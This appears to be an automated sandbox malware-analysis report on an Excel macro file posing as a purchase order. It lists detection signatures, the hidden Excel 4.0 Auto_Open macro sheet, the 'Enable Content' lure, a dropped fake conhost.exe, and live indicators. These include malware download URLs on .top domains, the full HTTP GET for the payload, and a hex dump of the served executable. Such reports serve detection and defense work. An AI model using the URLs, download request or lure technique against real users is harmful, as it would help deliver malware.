Analysis Report PURCHASE ORDER No-17-11-98543.xlsm

Overview

General Information

Sample Name: PURCHASE ORDER No-17-11-98543.xlsm
Analysis ID: 319311
MD5: 921ac551fe8d88c2185f39f0e777eabd
SHA1: 40702dc4f773cfa3fcf03c62ec810ba3f5e6b72d
SHA256: b1660b65514182bf97a767caa264b0500ef14692e69dae6ddca344591e7e016d
Tags: xlsm

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Contains functionality to detect sleep reduction / modifications
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found abnormal large hidden Excel 4.0 Macro sheet
Machine Learning detection for dropped file
Office process drops PE file
Sigma detected: System File Execution Location Anomaly
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Excel documents contains an embedded macro which executes code when the document is opened
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Multi AV Scanner detection for domain / URL
Source: gvbmkhvnyib.top Virustotal: Detection: 6% Perma Link
Source: gvbmkhvnyib.top Virustotal: Detection: 6% Perma Link
Source: http://gvbmkhvnyib.top/QtuFGobZaW/conhost.triumphloader Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\ETTER\dAneDFma\conhost.exe Virustotal: Detection: 29% Perma Link
Source: C:\ETTER\dAneDFma\conhost.exe ReversingLabs: Detection: 22%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloader ReversingLabs: Detection: 22%
Source: C:\ETTER\dAneDFma\conhost.exe Virustotal: Detection: 29% Perma Link
Source: C:\ETTER\dAneDFma\conhost.exe ReversingLabs: Detection: 22%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloader ReversingLabs: Detection: 22%
Multi AV Scanner detection for submitted file
Source: PURCHASE ORDER No-17-11-98543.xlsm Virustotal: Detection: 9% Perma Link
Source: PURCHASE ORDER No-17-11-98543.xlsm Virustotal: Detection: 9% Perma Link
Machine Learning detection for dropped file
Source: C:\ETTER\dAneDFma\conhost.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloader Joe Sandbox ML: detected
Source: C:\ETTER\dAneDFma\conhost.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloader Joe Sandbox ML: detected
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043FF74 FindFirstFileExW, 3_2_0043FF74
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_005501C4 FindFirstFileExW, 3_2_005501C4
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043FF74 FindFirstFileExW, 3_2_0043FF74
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_005501C4 FindFirstFileExW, 3_2_005501C4

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\ETTER\dAneDFma\conhost.exe Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\ETTER\dAneDFma\conhost.exe Jump to behavior
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: conhost[1].triumphloader.0.dr Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: conhost[1].triumphloader.0.dr Jump to dropped file
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\ETTER\dAneDFma\conhost.exe Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\ETTER\dAneDFma\conhost.exe Jump to behavior
Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 66MB
Source: excel.exe Memory has grown: Private usage: 4MB later: 66MB
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: gvbmkhvnyib.top
Source: global traffic DNS query: name: gvbmkhvnyib.top
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 193.106.175.25:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 193.106.175.25:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 193.106.175.25:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 193.106.175.25:80

Networking:

barindex
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 18 Nov 2020 06:57:22 GMTContent-Length: 297472Connection: keep-aliveLast-Modified: Wed, 18 Nov 2020 00:57:27 GMTETag: "48a00-5b457185761f5"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 13 06 a2 e9 72 68 f1 e9 72 68 f1 e9 72 68 f1 f7 20 ec f1 cf 72 68 f1 f7 20 fd f1 fa 72 68 f1 f7 20 eb f1 98 72 68 f1 ce b4 13 f1 ec 72 68 f1 e9 72 69 f1 9b 72 68 f1 f7 20 e2 f1 e8 72 68 f1 f7 20 fc f1 e8 72 68 f1 f7 20 f9 f1 e8 72 68 f1 52 69 63 68 e9 72 68 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 07 1b 50 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 24 04 00 00 b2 05 00 00 00 00 00 b9 15 00 00 00 10 00 00 00 40 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 0a 00 00 04 00 00 d1 b0 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 59 04 00 3c 00 00 00 00 d0 09 00 c0 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 55 04 00 18 00 00 00 e8 54 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 04 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 55 23 04 00 00 10 00 00 00 24 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 30 22 00 00 00 40 04 00 00 24 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 4a 05 00 00 70 04 00 00 14 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 09 00 00 00 00 c0 09 00 00 02 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 26 00 00 00 d0 09 00 00 28 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 18 Nov 2020 06:57:22 GMTContent-Length: 297472Connection: keep-aliveLast-Modified: Wed, 18 Nov 2020 00:57:27 GMTETag: "48a00-5b457185761f5"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 13 06 a2 e9 72 68 f1 e9 72 68 f1 e9 72 68 f1 f7 20 ec f1 cf 72 68 f1 f7 20 fd f1 fa 72 68 f1 f7 20 eb f1 98 72 68 f1 ce b4 13 f1 ec 72 68 f1 e9 72 69 f1 9b 72 68 f1 f7 20 e2 f1 e8 72 68 f1 f7 20 fc f1 e8 72 68 f1 f7 20 f9 f1 e8 72 68 f1 52 69 63 68 e9 72 68 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 07 1b 50 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 24 04 00 00 b2 05 00 00 00 00 00 b9 15 00 00 00 10 00 00 00 40 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 0a 00 00 04 00 00 d1 b0 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 59 04 00 3c 00 00 00 00 d0 09 00 c0 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 55 04 00 18 00 00 00 e8 54 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 04 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 55 23 04 00 00 10 00 00 00 24 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 30 22 00 00 00 40 04 00 00 24 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 4a 05 00 00 70 04 00 00 14 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 09 00 00 00 00 c0 09 00 00 02 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 26 00 00 00 d0 09 00 00 28 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: IQHOSTRU IQHOSTRU
Source: Joe Sandbox View ASN Name: IQHOSTRU IQHOSTRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /QtuFGobZaW/conhost.triumphloader HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gvbmkhvnyib.topConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /QtuFGobZaW/conhost.triumphloader HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gvbmkhvnyib.topConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\71A94C24.png Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\71A94C24.png Jump to behavior
Source: global traffic HTTP traffic detected: GET /QtuFGobZaW/conhost.triumphloader HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gvbmkhvnyib.topConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /QtuFGobZaW/conhost.triumphloader HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gvbmkhvnyib.topConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: gvbmkhvnyib.top
Source: unknown DNS traffic detected: queries for: gvbmkhvnyib.top
Source: conhost.exe String found in binary or memory: http://4cnx9s25gsvw.top/syZsNnTNps.vx
Source: conhost.exe String found in binary or memory: http://4cnx9s25gsvw.top/syZsNnTNps.vx

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8 Screenshot OCR: Enable Content X A' - (" & " A A B C D E F G H I J K L M N O P Q R S : 1 : 4 5 6 C : con
Source: Screenshot number: 12 Screenshot OCR: Enable Content X I Al " "," jR " A B C D E F G H I J K L M N O P Q R S 1=1 ' 301 302 303 30
Source: Screenshot number: 8 Screenshot OCR: Enable Content X A' - (" & " A A B C D E F G H I J K L M N O P Q R S : 1 : 4 5 6 C : con
Source: Screenshot number: 12 Screenshot OCR: Enable Content X I Al " "," jR " A B C D E F G H I J K L M N O P Q R S 1=1 ' 301 302 303 30
Found abnormal large hidden Excel 4.0 Macro sheet
Source: PURCHASE ORDER No-17-11-98543.xlsm Initial sample: Sheet size: 137151
Source: PURCHASE ORDER No-17-11-98543.xlsm Initial sample: Sheet size: 137151
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\ETTER\dAneDFma\conhost.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloader Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\ETTER\dAneDFma\conhost.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloader Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\ETTER\dAneDFma\conhost.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\ETTER\dAneDFma\conhost.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\ETTER\dAneDFma\conhost.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\ETTER\dAneDFma\conhost.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00409B83 NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory, 3_2_00409B83
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00409B83 NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory, 3_2_00409B83
Detected potential crypto function
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0041148C 3_2_0041148C
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043A17C 3_2_0043A17C
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_004421A5 3_2_004421A5
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00434501 3_2_00434501
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0040E599 3_2_0040E599
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043E6A9 3_2_0043E6A9
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00434735 3_2_00434735
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00444797 3_2_00444797
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00428808 3_2_00428808
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00434969 3_2_00434969
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042AAC4 3_2_0042AAC4
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00434BD0 3_2_00434BD0
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00430C60 3_2_00430C60
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042EC6A 3_2_0042EC6A
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042AE36 3_2_0042AE36
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042B0E0 3_2_0042B0E0
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042B3A7 3_2_0042B3A7
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042B662 3_2_0042B662
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042BA70 3_2_0042BA70
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00439C4D 3_2_00439C4D
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00439D71 3_2_00439D71
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0054A3CC 3_2_0054A3CC
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_005523F5 3_2_005523F5
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00544751 3_2_00544751
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00544985 3_2_00544985
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00538A58 3_2_00538A58
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00544BB9 3_2_00544BB9
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0053AD14 3_2_0053AD14
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00544E20 3_2_00544E20
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00540EB0 3_2_00540EB0
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0053EEBA 3_2_0053EEBA
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0041148C 3_2_0041148C
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043A17C 3_2_0043A17C
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_004421A5 3_2_004421A5
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00434501 3_2_00434501
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0040E599 3_2_0040E599
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043E6A9 3_2_0043E6A9
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00434735 3_2_00434735
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00444797 3_2_00444797
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00428808 3_2_00428808
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00434969 3_2_00434969
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042AAC4 3_2_0042AAC4
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00434BD0 3_2_00434BD0
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00430C60 3_2_00430C60
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042EC6A 3_2_0042EC6A
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042AE36 3_2_0042AE36
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042B0E0 3_2_0042B0E0
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042B3A7 3_2_0042B3A7
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042B662 3_2_0042B662
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042BA70 3_2_0042BA70
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00439C4D 3_2_00439C4D
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00439D71 3_2_00439D71
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0054A3CC 3_2_0054A3CC
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_005523F5 3_2_005523F5
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00544751 3_2_00544751
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00544985 3_2_00544985
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00538A58 3_2_00538A58
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00544BB9 3_2_00544BB9
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0053AD14 3_2_0053AD14
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00544E20 3_2_00544E20
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00540EB0 3_2_00540EB0
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0053EEBA 3_2_0053EEBA
Excel documents contains an embedded macro which executes code when the document is opened
Source: workbook.xml Binary string: " defaultThemeVersion="124226"/><bookViews><workbookView xWindow="0" yWindow="0" windowWidth="23040" windowHeight="9195"/></bookViews><sheets><sheet name="DocuSign" sheetId="20" r:id="rId1"/><sheet name="ProtectList1" sheetId="21" r:id="rId2"/><sheet name="ProtectList2" sheetId="19" r:id="rId3"/><sheet name="ProtectList3" sheetId="22" r:id="rId4"/></sheets><definedNames><definedName name="Dires" function="1" xlm="1" functionGroupId="9">-709623808</definedName><definedName name="dontdoit" function="1" xlm="1">-676986879</definedName><definedName name="Dtruh" function="1" xlm="1" functionGroupId="9">-712638463</definedName><definedName name="okwell" function="1" xlm="1">124715010</definedName><definedName name="plzno" function="1" xlm="1">-709623808</definedName><definedName name="Trolase" function="1" xlm="1" functionGroupId="9">-1602945022</definedName><definedName name="_xlnm.Auto_Open">ProtectList2!$A$1</definedName></definedNames><calcPr calcId="152511"/></workbook>
Source: workbook.xml Binary string: " defaultThemeVersion="124226"/><bookViews><workbookView xWindow="0" yWindow="0" windowWidth="23040" windowHeight="9195"/></bookViews><sheets><sheet name="DocuSign" sheetId="20" r:id="rId1"/><sheet name="ProtectList1" sheetId="21" r:id="rId2"/><sheet name="ProtectList2" sheetId="19" r:id="rId3"/><sheet name="ProtectList3" sheetId="22" r:id="rId4"/></sheets><definedNames><definedName name="Dires" function="1" xlm="1" functionGroupId="9">-709623808</definedName><definedName name="dontdoit" function="1" xlm="1">-676986879</definedName><definedName name="Dtruh" function="1" xlm="1" functionGroupId="9">-712638463</definedName><definedName name="okwell" function="1" xlm="1">124715010</definedName><definedName name="plzno" function="1" xlm="1">-709623808</definedName><definedName name="Trolase" function="1" xlm="1" functionGroupId="9">-1602945022</definedName><definedName name="_xlnm.Auto_Open">ProtectList2!$A$1</definedName></definedNames><calcPr calcId="152511"/></workbook>
Found potential string decryption / allocating functions
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 00428DB0 appears 62 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 00523144 appears 304 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 00539000 appears 51 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 004326F9 appears 149 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 00429D60 appears 43 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 00412EF4 appears 350 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 00539FB0 appears 39 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 0042962A appears 34 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 00428DB0 appears 62 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 00523144 appears 304 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 00539000 appears 51 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 004326F9 appears 149 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 00429D60 appears 43 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 00412EF4 appears 350 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 00539FB0 appears 39 times
Source: C:\ETTER\dAneDFma\conhost.exe Code function: String function: 0042962A appears 34 times
Yara signature match
Source: 00000003.00000003.2117438541.0000000000580000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 00000003.00000003.2117438541.0000000000580000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
